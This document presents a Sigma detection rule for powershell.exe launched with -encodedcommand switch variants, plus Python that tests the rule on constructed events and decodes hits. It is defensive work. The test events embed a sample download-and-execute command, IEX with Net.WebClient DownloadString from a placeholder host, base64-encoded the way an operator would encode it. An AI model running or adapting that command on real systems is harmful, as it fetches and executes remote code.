PowerShell -encodedcommand Switch

Looks for the execution of powershell.exe with command lines that include variations of the -encodedcommand argument. Inspired by the 2022 Red Canary Threat Detection report. The `windash` modifier on the `CommandLine` field makes each listed value match with either switch prefix (`-enc` and `/enc`), since powershell.exe accepts both; matching is plain case-insensitive substring matching, so any argument beginning with those letters (for example `-Encoding`) also hits. The image filter is limited to `\powershell.exe`, so PowerShell 7 (`pwsh.exe`) is not covered by this rule.

Sigma rule

```yaml
title: PowerShell -encodedcommand Switch
id: 5c0fcaac-e5e9-44a3-811f-b43b7709c339
status: experimental
description: Looks for the execution of powershell.exe with command lines that include
    variations of the -encodedcommand argument. Inspired by the 2022 Red Canary Threat
    Detection report.
references:
    - https://redcanary.com/threat-detection-report/techniques/powershell/
author: Micah Babinski
date: 2022/11/04
tags:
    - attack.defense_evasion
    - attack.t1140
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|windash:
            - '-ec'
            - '-en'
            - '-enc'
            - '-enco'
        Image|endswith: '\powershell.exe'
    condition: selection
falsepositives:
    - Windows Config Manager (https://wtfbins.wtf/1)
level: high
```
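The rule's selection logic, run over a handful of constructed process-creation events, as an added example. This is editor-written Python, not code from the rule author or from SigmaHQ: the field names `Image` and `CommandLine` follow the rule, the events are made up to exercise the windash variants, the image filter and a substring false positive, and the payload decoder's handling of switch prefixes is an assumption based on powershell.exe accepting `-e`, `-ec`, `-enc` and `-EncodedCommand` for the same parameter.

```python
"""Evaluate the 'PowerShell -encodedcommand Switch' selection over sample events
and decode the base64/UTF-16LE payload of any hit (added example, not rule code)."""
import base64
import re

# Values from the rule's CommandLine|contains|windash list. Sigma's windash modifier
# expands a leading '-' to both '-' and '/' because Windows tools accept either switch
# prefix; Sigma string matching is case-insensitive unless a modifier says otherwise.
SWITCH_VALUES = ["-ec", "-en", "-enc", "-enco"]
IMAGE_SUFFIX = "\\powershell.exe"


def windash_variants(value: str) -> list[str]:
    """Return the match strings the windash modifier generates for one value."""
    if value.startswith("-"):
        return [value, "/" + value[1:]]
    return [value]


def matches_rule(event: dict) -> bool:
    """Evaluate the rule's 'selection' (both fields must match) against one event."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "").lower()
    if not image.endswith(IMAGE_SUFFIX):
        return False
    return any(variant in cmd
               for value in SWITCH_VALUES
               for variant in windash_variants(value))


# Assumption: powershell.exe treats -e, -ec, -en, -enc ... -EncodedCommand as the same
# parameter, so the switch is '-e' optionally followed by 'c' or by 'n...'. '-ep' and
# '-ea' are different parameters and deliberately do not match.
ENCODED_ARG_RE = re.compile(r"[-/]e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmd: str):
    """Recover the script passed via -EncodedCommand (base64 over UTF-16LE), or None."""
    m = ENCODED_ARG_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        # Not valid base64, or not UTF-16LE: the token after the switch was not a payload.
        return None


def encode_command(script: str) -> str:
    """Build the argument the way an operator would: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
PS_IMAGE = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

# Constructed Sysmon-style process_creation events (not real telemetry).
EVENTS = [
    {"Image": PS_IMAGE,                                   # 0: classic -enc launch
     "CommandLine": "powershell.exe -NoP -W Hidden -enc " + encode_command(SCRIPT)},
    {"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe /EC " + encode_command(SCRIPT)},  # 1: windash + case
    {"Image": PS_IMAGE,                                   # 2: benign, no -e* switch
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"Image": "C:\\Windows\\System32\\cmd.exe",           # 3: right string, wrong image
     "CommandLine": "cmd.exe /c echo -enc"},
    {"Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",  # 4: pwsh.exe is not covered
     "CommandLine": "pwsh.exe -enc " + encode_command(SCRIPT)},
    {"Image": PS_IMAGE,                                   # 5: substring hit on -Encoding
     "CommandLine": "powershell.exe -Command \"Get-Content -Encoding UTF8 C:\\t.txt\""},
]


def run_rule(events):
    """Return (index, decoded payload or None) for every event the selection matches."""
    hits = []
    for i, ev in enumerate(events):
        if matches_rule(ev):
            hits.append((i, decode_encoded_command(ev["CommandLine"])))
    return hits


if __name__ == "__main__":
    for i, decoded in run_rule(EVENTS):
        print(f"hit on event {i}: decoded={decoded!r}")
```

Events 0, 1 and 5 fire; 2, 3 and 4 do not. Event 5 shows the cost of plain substring matching (`-Encoding` contains `-enc`), and event 4 shows the `pwsh.exe` gap in the image filter; the decoder only yields a script for the two real encoded launches, so decoding the payload is a cheap way to triage hits before escalating.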
